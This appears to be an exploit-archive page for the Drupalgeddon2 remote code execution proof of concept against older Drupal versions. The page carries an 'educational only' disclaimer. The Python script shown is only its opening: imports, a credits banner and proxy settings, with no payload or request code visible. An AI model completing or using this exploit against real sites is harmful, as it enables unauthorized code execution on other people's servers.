Exploits / Vulnerability Discovered : 2018-04-13 |
Type : webapps |
Platform : php
This exploit / vulnerability Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 drupalgeddon2 remote code execution (poc) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
#
# example:
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# verify = False
proxies = {}
verify = True